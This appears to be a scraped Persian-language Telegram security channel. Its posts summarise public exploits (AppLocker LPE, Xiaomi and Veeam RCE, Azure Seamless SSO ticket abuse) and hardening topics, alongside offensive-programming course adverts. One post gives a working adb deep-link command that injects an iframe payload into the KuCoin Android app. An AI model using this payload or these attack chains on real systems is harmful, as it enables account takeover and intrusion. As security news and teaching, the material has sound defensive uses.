⭕️ استفاده از مدلهای Large Language Models (LLMs) در کشف آسیب پذیریها به شکل چشمگیری امنیت سایبری را متحول میکند، با خودکارسازی شناسایی آسیبپذیریها، بهبود تحلیل تهدیدها. این مدلهای پیشرفته، مانند GPT-4، به طور قابل توجهی بهرهوری را با اسکن سریع کد، Generating Test Cases و ارائه گزارشهای دقیق از آسیبپذیریها بهبود میبخشند.
توانایی آنها در پردازش و تحلیل حجم عظیمی از دادهها به متخصصان امنیت کمک میکند تا نقاط ضعف احتمالی را به شکل موثرتری شناسایی و رفع کنند. ادغام LLMها در برنامههای Bug Bounty نه تنها شناسایی نقصهای امنیتی را تسریع میکند، بلکه فرایند کلی شناسایی تهدیدها را بهینه کرده و در نتیجه، دفاع در برابر تهدیدهای سایبری (Cyber Threats) در حال تکامل را تقویت میکند.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/
#LLM
@securation
توانایی آنها در پردازش و تحلیل حجم عظیمی از دادهها به متخصصان امنیت کمک میکند تا نقاط ضعف احتمالی را به شکل موثرتری شناسایی و رفع کنند. ادغام LLMها در برنامههای Bug Bounty نه تنها شناسایی نقصهای امنیتی را تسریع میکند، بلکه فرایند کلی شناسایی تهدیدها را بهینه کرده و در نتیجه، دفاع در برابر تهدیدهای سایبری (Cyber Threats) در حال تکامل را تقویت میکند.
https://hadess.io/practical-use-of-large-language-models-llms-in-bug-bounty-hunting/
#LLM
@securation
Forwarded from کانال بایت امن
#DWORD #CPL1
📣 ثبت نام دوره دوم آموزش زبان برنامه نویسی C | سطح مقدماتی و متوسط
◀️ با محوریت مهندسی معکوس و برنامه نویسی امن
✈️ مشخصات دوره :
⬅️ سطح دوره : مقدماتی و متوسط
⬅️ تعداد ساعت دوره : 25 ساعت
⬅️ نحوه برگزاری : آفلاین ( ویدیو های رکورد شده + پلیر اختصاصی )
⬅️ زبان دوره : فارسی و انگلیسی
⬅️ تعداد سر فصل : 25
⬅️ ارزیابی و مدرک پایان دوره : دارد
⬅️ گروه پشتیبانی : دارد
✈️ نکات کلیدی دوره :
⬅️ آموزش پیشنیاز های لازم و مفاهیم برنامه نویسی
⬅️ شامل استاندارد های ANSI C تا C17
⬅️ کد نویسی در محیط های برنامه نویسی Visual Studio و Visual Studio Code
⬅️ کد نویسی در سیستم عامل های ویندوز و لینوکس
⬅️ ساخت برنامه های Cross-Platform
⬅️ کار با ابزار های CMake و Automake
⬅️ آموزش به صورت پروژه محور و بررسی خلاصه محتوای هر بخش در پایان آن
⬅️ حل سوالات مربوط به مصاحبه های کاری و مرور کردن مطالب در انتهای دوره
⬅️ جلسات آنلاین رفع اشکال و پرسش و پاسخ
⬅️ مناسب برای تمامی گرایش های نیازمند به زبان برنامه نویسی C
◀️ در این دوره فرض بر این گرفته شده که زبان C به عنوان اولین زبانی است که قصد یادگیری آن را دارید. به همین دلیل، تمامی پیشنیازها به طور کامل توضیح داده شدهاند و تمامی بخشها به ریز و با نکات کاربردی بیان شدهاند.
در هر مرحله از دوره، مفاهیم با جزئیات توضیح داده شده و با مثالهای عملی و تمرینهای متنوع پشتیبانی میشوند تا یادگیری به بهترین شکل ممکن انجام شود. هدف این است که شما بتوانید با اعتماد به نفس و درک عمیق، برنامهنویسی به زبان C را آغاز کنید.
🎁 طبق روال همیشگی، دانشجویان سایر دوره های آکادمی DWORD از تخفیف برخوردار خواهند بود.
🎁 در صورت تمایل به شرکت در دوره و پرداخت شهریه به صورت اقساط با مدرس دوره در ارتباط باشید.
✈️ مشاهده اطلاعات کامل دوره، سرفصل و ثبت نام
🎤 ارتباط با مدرس دوره
▶️ پلی لیست ویدیو های دمو دوره
🦅 کانال بایت امن | گروه بایت امن
_
در هر مرحله از دوره، مفاهیم با جزئیات توضیح داده شده و با مثالهای عملی و تمرینهای متنوع پشتیبانی میشوند تا یادگیری به بهترین شکل ممکن انجام شود. هدف این است که شما بتوانید با اعتماد به نفس و درک عمیق، برنامهنویسی به زبان C را آغاز کنید.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ اخیراً آسیبپذیری جدیدی در درایور AppLocker ویندوز کشف شده است که منجر به ارتقاء سطح دسترسی (LPE) میشود.
این نقص به دلیل ارجاع نادرست اشارهگر درایور appid.sys در تابع AppHashComputeImageHashInternal() ایجاد میشود.
مهاجمان با ارسال یک IOCTL خاص (0x22A018) به Object دستگاه \\Device\\Appid میتوان کنترل کامل بر پوینتر و دیتا موجود در آرگومان اول توسط یک Callback بدست آورد.
چالش هایی که میتوان به آن اشاره کرد:
و در آخر مهاجم میتواند با استفاده از دو روش مختلف این آسیبپذیری را بهرهبرداری کند:
#RedTeam #LPE #Vulnerability_Analysis
@securation
این نقص به دلیل ارجاع نادرست اشارهگر درایور appid.sys در تابع AppHashComputeImageHashInternal() ایجاد میشود.
مهاجمان با ارسال یک IOCTL خاص (0x22A018) به Object دستگاه \\Device\\Appid میتوان کنترل کامل بر پوینتر و دیتا موجود در آرگومان اول توسط یک Callback بدست آورد.
چالش هایی که میتوان به آن اشاره کرد:
SMEP و kCFG : مهاجم باید از راههای دیگری برای حمله استفاده کند، زیرا اجرای مستقیم کد کاربر ممنوع است.
KASLR: با استفاده از syscall NtQuerySystemInformation() مهاجم میتواند آدرسهای لازم کرنل را دریافت کند.
بارگذاری درایور: درایور به صورت پیشفرض بارگذاری نمیشود و باید به صورت دستی بارگذاری گردد.
و در آخر مهاجم میتواند با استفاده از دو روش مختلف این آسیبپذیری را بهرهبرداری کند:
تغییر فیلد PreviousMode یک KTHREAD هدف و استفاده از syscalls برای دسترسی خواندن/نوشتن دلخواه در فضای کرنل.
تغییر ساختار _SEP_TOKEN_PRIVILEGES توکن فرآیند جاری برای فعال کردن SeDebugPrivilege.
#RedTeam #LPE #Vulnerability_Analysis
@securation
Crowdfense
Windows AppLocker Driver LPE Vulnerability - CVE-2024-21338 - Crowdfense
In-depth analysis of CVE-2024-21338, a Windows Kernel Elevation of Privileges vulnerability, its root cause, exploitation challenges and POC
⭕️ افتا Wallix رو ممنوع کرد و ما خیلی خوشحال میشیم یک متخصص (البته اگر افتا همچین کسی رو داشته باشه) ، بیاد یک لایو بذاره و توضیحاتی بده چرا باید همچین محصول خیلی خوبی رو ممنوع کنه؟
-همچنین افتا استفاده از محصولات Eset و Symantec رو هم ممنوع اعلام کرد.
طوری که من شنیدم شرکت های رانتی/امنیتی که بنام "بومی سازی" دارن فعالیت میکنند پشت پرده این حرکات غیرفنی-عقلانی در افتا هست.
نکته جالبتر این هست که محصولات شرکت جاسوسی-امنیتی Positive Technology روسیه رو قراره بیارن جا بندازن توی زیرساخت دولت ایران:)
چرا ؟ چون میگن با قوانین حاکمیت مشکلی نداره و میپذیرد که در ایران نمایندگی رسمی داشته باشد و طبق قوانین ایران عمل کند.
+نخندید ولی فکر کنید بگن Kaspersky از روسیه ممنوعه ولی از Positive Technology از روسیه ممنوع نیست.
خب بیاید کشور رو دو دستی تقدیم روسیه کنید چرا قوانین گاو در آوردی در میارین.
#افتا #کسپر #جاسوسی
#PTsecurity
@securation
-همچنین افتا استفاده از محصولات Eset و Symantec رو هم ممنوع اعلام کرد.
طوری که من شنیدم شرکت های رانتی/امنیتی که بنام "بومی سازی" دارن فعالیت میکنند پشت پرده این حرکات غیرفنی-عقلانی در افتا هست.
نکته جالبتر این هست که محصولات شرکت جاسوسی-امنیتی Positive Technology روسیه رو قراره بیارن جا بندازن توی زیرساخت دولت ایران:)
چرا ؟ چون میگن با قوانین حاکمیت مشکلی نداره و میپذیرد که در ایران نمایندگی رسمی داشته باشد و طبق قوانین ایران عمل کند.
+نخندید ولی فکر کنید بگن Kaspersky از روسیه ممنوعه ولی از Positive Technology از روسیه ممنوع نیست.
خب بیاید کشور رو دو دستی تقدیم روسیه کنید چرا قوانین گاو در آوردی در میارین.
#افتا #کسپر #جاسوسی
#PTsecurity
@securation
👍1
Media is too big
VIEW IN TELEGRAM
⭕️ RCE on Xiaomi 13 Pro (CVE-2023-26324)
👉Exploitation:
1) Open URL in WebView
2) Inject JavaScript
3) Execute JavaScript Interface functions from vulnerable GetApps to install & launch payload
4) Get shell
📎 Slides with PoC: DL-Link
#Android
@Securation
👉Exploitation:
1) Open URL in WebView
2) Inject JavaScript
3) Execute JavaScript Interface functions from vulnerable GetApps to install & launch payload
4) Get shell
📎 Slides with PoC: DL-Link
#Android
@Securation
⭕️ پس از ارایه نسخههای Windows 11 24H2 و Windows Server 2025 ویژگی های امنیتی به SMB اضافه شد که در لیست زیر به تعدادی از آن ها و استفاده درست آن میپردازیم:
SMB signing required by default
SMB NTLM blocking
SMB authentication rate limiter
SMB insecure guest auth
SMB over QUIC in Windows Server all editions
SMB dialect management
SMB client encryption mandate now supported
Remote Mailslots deprecated and disabled
SMB over QUIC client access control
SMB alternative ports
SMB Firewall default port changes
SMB auditing improvments
با ترکیب این ویژگی ها تا حد ممکنه پروتکل SMB امن خواهد شد.
#Hardening #SMB
@securation
SMB signing required by default
SMB Sign اکنون بهصورت پیشفرض برای تمام اتصالات ورودی و خروجی SMB در Windows 11 24H2 و تمام اتصالات خروجی در Windows Server 2025 الزامی شده است. قبلاً، Signing فقط در موارد خاصی مانند Share های SYSVOL و NETLOGON الزامی بود.
SMB NTLM blocking
اکنون، SMB Client از مسدودسازی احراز هویت NTLM برای اتصالات خروجی از راه دور پشتیبانی میکند. این ویژگی یک بهبود مهم است زیرا خطرات مرتبط با NTLM مانند حملات Brute force، Relay و Pass-the-hash را کاهش میدهد و تضمین میکند که فقط احراز هویت Kerberos، که امنتر است، استفاده شود.
SMB authentication rate limiter
برای مقابله با حملات Brute force، سرویس SMB Server اکنون Rate Limit های ناموفق برای احراز هویت را محدود میکند. با یک تاخیر 2 ثانیهای پیشفرض بین هر تلاش ناموفق، این ویژگی سرعت مهاجمان را به طور قابل توجهی کاهش میدهد و احتمال اینکه از تلاش خود منصرف شوند را افزایش میدهد.
SMB insecure guest auth
در Windows 11 Pro، اتصالات Guest و بازگشت به احراز هویت Guest در SMB بهصورت پیشفرض غیرفعال شده است، که این نسخه را با نسخههای دیگر مانند Enterprise و Education هماهنگ میکند.
SMB over QUIC in Windows Server all editions
SMB بر روی QUIC که قبلاً فقط در نسخه Azure Edition در دسترس بود، اکنون در تمام نسخههای Windows Server 2025 گنجانده شده است. این ویژگی امکان ارتباط امن SMB بر روی شبکههای غیرمطمئن با استفاده از TLS 1.3 را فراهم میکند، که آن را برای کاربران موبایل و راه دور ایدهآل میسازد، بدون نیاز به VPN.
SMB dialect management
SMB client encryption mandate now supported
Remote Mailslots deprecated and disabled
SMB over QUIC client access control
SMB alternative ports
SMB Firewall default port changes
SMB auditing improvments
با ترکیب این ویژگی ها تا حد ممکنه پروتکل SMB امن خواهد شد.
#Hardening #SMB
@securation
TECHCOMMUNITY.MICROSOFT.COM
SMB security hardening in Windows Server 2025 & Windows 11 | Microsoft Community Hub
Many changes are coming to the SMB protocol in Windows 11 and Windows Server 2025. Read up on what will be generally available later in 2024.
Forwarded from فوتبال ۳۶۰
منچستر قرمز است!
😱 وقتی توییتر امباپه هک میشود
‼️ بامداد امروز اکانت رسمی کیلین امباپه در توییتر هک شد و توییتهای عجیبی با نام او منتشر شد!
💬 «منچستر قرمز است!»
💬 «سال ۲۰۲۸ در انتقالی رایگان به منچستریونایتد میروم.»
💬 «کریستیانو رونالدو بهترین بازیکن تاریخ فوتبال است. مسی اسطوره من نیست.»
✅ پس از ساعاتی اکانت توییتر ستاره رئال مادرید بازیابی شد و به حالت اولیه بازگشت.
@Ft360_ir
@Ft360_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
معرفی دوره های آموزشی آکادمی DWORD - ( دوره های آفلاین )
▪️دوره آموزش مهندسی معکوس نرم افزار سطح مقدماتی - متوسط | دوره پنجم
▪️دوره آموزش زبان برنامه نویسی اسمبلی ویندوز | سطح مقدماتی - متوسط
▪️دوره آموزش برنامه نویسی سیستمی ویندوز | سطح پیشرفته
▪️دوره آموزش برنامه نویسی C ویندوز و لینوکس | سطح مقدماتی - متوسط
🖥 امکان ثبت نام در دوره ها به صورت اقساط و همچنین تخفیف 10% برای دانشجویان سابق آکادمی فراهم هست. تمامی دوره ها گروه پشتیبانی جهت پرسش و پاسخ دارند.
🦅 کانال بایت امن | گروه بایت امن
_
▪️دوره آموزش مهندسی معکوس نرم افزار سطح مقدماتی - متوسط | دوره پنجم
▪️دوره آموزش زبان برنامه نویسی اسمبلی ویندوز | سطح مقدماتی - متوسط
▪️دوره آموزش برنامه نویسی سیستمی ویندوز | سطح پیشرفته
▪️دوره آموزش برنامه نویسی C ویندوز و لینوکس | سطح مقدماتی - متوسط
🖥 امکان ثبت نام در دوره ها به صورت اقساط و همچنین تخفیف 10% برای دانشجویان سابق آکادمی فراهم هست. تمامی دوره ها گروه پشتیبانی جهت پرسش و پاسخ دارند.
🦅 کانال بایت امن | گروه بایت امن
_
⭕️ Pynt یک پلتفرم تست امنیتی API است که به توسعهدهندگان و تیمهای امنیتی کمک میکند تا امنیت API ها را به صورت خودکار و در مراحل اولیه توسعه، ارزیابی و تضمین کنند. این پلتفرم به طور ویژه برای پوشش خلأ های امنیتی API طراحی شده و ویژگیهای منحصربهفردی را برای این منظور ارائه میدهد.
از ویژگی های آن:
خودکارسازی تستهای امنیتی API:
Context-Aware Testing:
Zero False Positives:
پشتیبانی از OWASP Top 10 و لیستهای امنیتی دیگر:
ادغام با ابزارهای توسعه و CI/CD:
ارائه گزارشهای کامل و Remediation Paths:
پشتیبانی از انواع مختلف API ها:
#AppSec #APISecurity
@securation
از ویژگی های آن:
خودکارسازی تستهای امنیتی API:
Pynt به ما این امکان را میدهد تا تستهای امنیتی را به صورت خودکار بر روی API ها اجرا کنید. این تستها بر اساس سناریوهای واقعی حمله مانند تزریق کد و حملات scraping اجرا میشوند و از این طریق به شناسایی و رفع آسیبپذیریها قبل از تولید کمک میکنند.
Context-Aware Testing:
Pynt از تحلیلهای مختلف برای درک بهتر کارکردهای خاص API ها و نحوه تعامل آنها با فرآیندهای تجاری استفاده میکند. این قابلیت کمک میکند تا آسیبپذیریهای خاصی که ممکن است در تستهای استاندارد نادیده گرفته شوند، شناسایی شوند.
Zero False Positives:
یکی از مواردی که ادعا کرده این ابزار دقت بالای آن در تشخیص آسیبپذیریها بدون ایجاد خطا است.
پشتیبانی از OWASP Top 10 و لیستهای امنیتی دیگر:
با استفاده از استانداردهای OWASP و سایر استاندارد های امنیتی،اقدام به بررسی میکند.
ادغام با ابزارهای توسعه و CI/CD:
این پلتفرم به راحتی با ابزارهای محبوب توسعه API مانند Postman و BurpSuite و سیستمهای CI/CD ادغام میشود، که به توسعهدهندگان امکان میدهد امنیت API ها را بهصورت مستقیم در جریان توسعه بررسی کنند.
ارائه گزارشهای کامل و Remediation Paths:
گزارشهای کاملی از آسیبپذیریها همراه با پیشنهادات رفع مشکل و تیکتهای خودکار ارائه میدهد که این فرآیند را برای تیمهای امنیتی و توسعهدهندگان سادهتر میکند.
پشتیبانی از انواع مختلف API ها:
از انواع مختلف API ها شامل REST، SOAP، و GraphQL پشتیبانی میکند، و با توجه به نیازهای خاص هر نوع API، تستهای مربوطه را انجام میدهد.
در آخر میتوان در نسخه های trial و تجاری از آن استفاده کرد.
#AppSec #APISecurity
@securation
www.pynt.io
Pynt: Effortless API Security Testing
Pynt offers dynamic API security testing for developers and testers to identify and fix vulnerabilities during the development lifecycle.
⭕️ اگر به ساختار Azure و ارتباط معماری های On-perm با آن رجوع کرده باشید، خواهید دانست که سرویس Seamless SSO با استفاده از تیکت های Kerberos Active Directory محلی اقدام به دسترسی Azure و سرویس 365 میکند.
در ادامه این سرویس با استفاده از تیکت ارسال شده یک Computer Account به اسم AZUREADSSOACC با SPN های خاص ایجاد میکند،
که در زمان Validate شدن با Entra ID server مورد استفاده قرار میگیرد.
حال اگر با دیدگاه RedTeam به آن دقت کنیم متوجه چند مورد خواهیم شد:
در ادامه با دسترسی به محیط مربوطه با استفاده از ROADTools و AADInternals میتوان اقدام به Enumeration و Exploitation کرد.
#RedTeam #Azure #Cloud
@securation
در ادامه این سرویس با استفاده از تیکت ارسال شده یک Computer Account به اسم AZUREADSSOACC با SPN های خاص ایجاد میکند،
که در زمان Validate شدن با Entra ID server مورد استفاده قرار میگیرد.
حال اگر با دیدگاه RedTeam به آن دقت کنیم متوجه چند مورد خواهیم شد:
در صورت نبود Credential به شکل Clear-text، ما به سه شکل میتوانیم با استفاده از این تکنیک و ابزار SeamlessPass به دسترسی برسیم:
در حالت اول ما TGT یا KRBTGT را دارا هستیم که با Golden,Diamond,و ازین قبیل حملات، اقدام به تولید TGS میکنیم و ادامه ماجرا.
در حالت دوم ما NTML Hash و یا AES key را دارا هستیم، که اقدام به دریافت TGT و TGS میکنیم و ادامه ماجرا.
و در حالت سوم ما NTLM Hash و AES Key اکانت AZUREADSSOACC که پیش تر صحبت شد را دارا هستیم، که میتوان TGS تولید کند و بدون هیچ تعاملی با DC، در Azure احراز هویت کند.
در ادامه با دسترسی به محیط مربوطه با استفاده از ROADTools و AADInternals میتوان اقدام به Enumeration و Exploitation کرد.
#RedTeam #Azure #Cloud
@securation
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ اکسپلویت DeepLink و جاوا اسکریپت اینترفیس و بدست آوردن دسترسی غیرمجاز در اپ اندروید صرافی کوکوین
در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد
📎 BlogPost
@Securation
#Android
در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد
adb shell am start -d 'kucoin:///link?data=\<noscript\>document.write\(\"\<iframe src=https://www.example.com style=position:fixed;top:0;left:0;width:100%;height:100%;border:none;\>\<\/iframe\>\"\)\;\</noscript\>'
📎 BlogPost
@Securation
#Android
Forwarded from کانال بایت امن
Media is too big
VIEW IN TELEGRAM
#Course #DWORD
🖥 ویدیو معرفی دوره برنامه نویسی تهاجمی مختص به تیم های قرمز
📊 بررسی کامل دوره، سرفصل ها و موضوعاتی که در هر فصل بیان خواهند شد.
⏰ آخرین بروزرسانی سرفصل ها : 18 September 2024
🖥 شهریه دوره ۱۵,۰۰۰,۰۰۰ تومان است که با ۲۰٪ تخفیف به ۱۰ نفر اول ارائه میشود.
📑 همچنین، امکان پرداخت به صورت اقساط نیز فراهم است.
🖥 نحوه شرکت در دوره :
به دلیل ظرفیت محدود کلاس، اولویت ثبتنام با دانشجویانی است که آزمون تعیین سطح را گذرانده باشند. چنانچه پیشنیازهای لازم برای شرکت در دوره را ندارید، همچنان میتوانید در دوره شرکت کنید، اما ابتدا باید این پیشنیازها را بگذرانید. جهت دریافت اطلاعات بیشتر به آیدی @YMahmoudnia پیغام بدین.
🦅 کانال بایت امن | گروه بایت امن
_
به دلیل ظرفیت محدود کلاس، اولویت ثبتنام با دانشجویانی است که آزمون تعیین سطح را گذرانده باشند. چنانچه پیشنیازهای لازم برای شرکت در دوره را ندارید، همچنان میتوانید در دوره شرکت کنید، اما ابتدا باید این پیشنیازها را بگذرانید. جهت دریافت اطلاعات بیشتر به آیدی @YMahmoudnia پیغام بدین.
_
Please open Telegram to view this post
VIEW IN TELEGRAM
⭕️ به تازگی یک آسیبپذیری در نسخههای 12.1.2.172 و قدیمیتر نرمافزار Veeam Backup شناسایی شده که منجر به RCE از طریق Deserialization و دور زدن مکانیزمهای امنیتی میشود.
نرمافزار Veeam در ارتباطات خود به DotNet Remoting متکی است که یک API برای ارتباطات IPC و گاهی RPC به حساب میآید. در این ارتباطات، برای Serialize کردن دادهها، دو روش موجود است، اما در Veeam از روش BinaryFormatter استفاده میشود.
آسیبپذیری اصلی در کلاس CBinaryServerFormatterSink رخ میدهد که به دلیل عدم اعتبارسنجی مناسب نوع ورودیها، امکان سوءاستفاده از آن وجود دارد.
هرچند کلاسهای CWhitelist و CBlacklist برای جلوگیری از مشکلات Deserialization طراحی شدهاند، اما این آسیبپذیری به دلیل Misconfiguration در این کلاسها قابل دور زدن است.
این مسئله در نهایت به ترکیب این کلاسهای آسیبپذیر با سایر اجزای سیستم منجر به RCE میشود.
همچنین، برای دور زدن احراز هویت و دسترسی به پیامهای ارسالی در کانال ارتباطی، از Interface IServerChannelSink استفاده میشود که بخشی از زیرساخت DotNet Remoting است.
https://github.com/watchtowrlabs/CVE-2024-40711
#RedTeam #vulnerability_Analysis #Exploitation
@securation
نرمافزار Veeam در ارتباطات خود به DotNet Remoting متکی است که یک API برای ارتباطات IPC و گاهی RPC به حساب میآید. در این ارتباطات، برای Serialize کردن دادهها، دو روش موجود است، اما در Veeam از روش BinaryFormatter استفاده میشود.
آسیبپذیری اصلی در کلاس CBinaryServerFormatterSink رخ میدهد که به دلیل عدم اعتبارسنجی مناسب نوع ورودیها، امکان سوءاستفاده از آن وجود دارد.
هرچند کلاسهای CWhitelist و CBlacklist برای جلوگیری از مشکلات Deserialization طراحی شدهاند، اما این آسیبپذیری به دلیل Misconfiguration در این کلاسها قابل دور زدن است.
این مسئله در نهایت به ترکیب این کلاسهای آسیبپذیر با سایر اجزای سیستم منجر به RCE میشود.
همچنین، برای دور زدن احراز هویت و دسترسی به پیامهای ارسالی در کانال ارتباطی، از Interface IServerChannelSink استفاده میشود که بخشی از زیرساخت DotNet Remoting است.
https://github.com/watchtowrlabs/CVE-2024-40711
#RedTeam #vulnerability_Analysis #Exploitation
@securation
GitHub
GitHub - watchtowrlabs/CVE-2024-40711: Pre-Auth Exploit for CVE-2024-40711
Pre-Auth Exploit for CVE-2024-40711. Contribute to watchtowrlabs/CVE-2024-40711 development by creating an account on GitHub.
Forwarded from Security Analysis
دوستان عزیز گروه تبادل دانش امنیت اطلاعات لینکش اینه :
https://news.1rj.ru/str/DarkPwners
لطفا قبل شروع گفتگو یا ارسال مطلب ، قوانین گروه رو مطالعه کنید.
https://news.1rj.ru/str/DarkPwners
لطفا قبل شروع گفتگو یا ارسال مطلب ، قوانین گروه رو مطالعه کنید.
Telegram
Security Analysis Group
گروه تبادل دانش امنیت اطلاعات
Forwarded from کانال بایت امن
This media is not supported in your browser
VIEW IN TELEGRAM
#Session
🖥 ویدیو جلسه اول | "دوره برنامه نویسی تهاجمی"
⏰ مدت زمان :5 دقیقه
🔗 لینک دانلود مستقیم
💠 فصل اول : Offensive Programming: Core Concepts
⬅️ تعریف برنامه نویسی تهاجمی
⬅️ اهداف، تکنیک ها و مهارت های مورد نیاز برنامه نویسی تهاجمی
⬅️ هدف اصلی دوره
🦅 کانال بایت امن | گروه بایت امن
_
_
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from کانال بایت امن
Media is too big
VIEW IN TELEGRAM
#Session
🖥 ویدیو جلسه دوم | "دوره برنامه نویسی تهاجمی"
⏰ مدت زمان :30 دقیقه
🔗 لینک دانلود مستقیم
💠 فصل اول : Offensive Programming: Core Concepts
⬅️ چه زبان برنامهنویسی برای برنامهنویسی تهاجمی مناسب است؟
⬅️ بررسی موارد و فاکتورهای انتخاب زبان برنامهنویسی
⬅️ بررسی یک زبان برنامهنویسی از ابعاد General، Technical و Special Usage
⬅️ بررسی دو مورد مهم از دید مکانیسمهای امنیتی در جهت تحلیل باینریها
⬅️ دموی بررسی نحوه فراخوانی یک API و ارتباط آن با جداول Import
🦅 کانال بایت امن | گروه بایت امن
_
_
Please open Telegram to view this post
VIEW IN TELEGRAM
Media is too big
VIEW IN TELEGRAM
⭕️ حل چالش مهندسی معکوس اپلیکیشن اندروید با موبایل.
چالش Milad Tower در مسابقات Olympics CTF
#Reverse #Android #CTF
#OlympicCTF
@Securation
چالش Milad Tower در مسابقات Olympics CTF
#Reverse #Android #CTF
#OlympicCTF
@Securation
Writeups_OlympicsPwners.pdf
1.9 MB
⭕️رایت آپ چالشهای حل شده توسط تیم OlympicsPwners تیم دوم مسابقات کشوری Olympics CTF که توسط معاونت علمی ریاست جمهوری برگزار شد.
@securation
@securation
Forwarded from کانال بایت امن
Media is too big
VIEW IN TELEGRAM
#Session
🖥 ویدیو جلسه سوم | "دوره برنامه نویسی تهاجمی"
⏰ مدت زمان :15 دقیقه
🔗 لینک دانلود مستقیم
💠 فصل اول : Offensive Programming: Core Concepts
⬅️ مروری بر مفاهیم Red Team و Red Teaming
⬅️ آشنایی با مفهوم Attack Life Cycle
⬅️ بررسی مدل Cyber Kill Chain
⬅️ بررسی مدل Mandiant
⬅️ ارتباط برنامهنویسی تهاجمی و Attack Life Cycle
⬅️ ارائه یک سناریو مبتنی بر مدل Cyber Kill Chain
⬅️ درک مفهوم TTP و تحلیل یک سناریو واقعی بر اساس TTP
⬅️ معرفی مختصر Mitre، LOLBAS، و LOLDrivers
🦅 کانال بایت امن | گروه بایت امن
_
_
Please open Telegram to view this post
VIEW IN TELEGRAM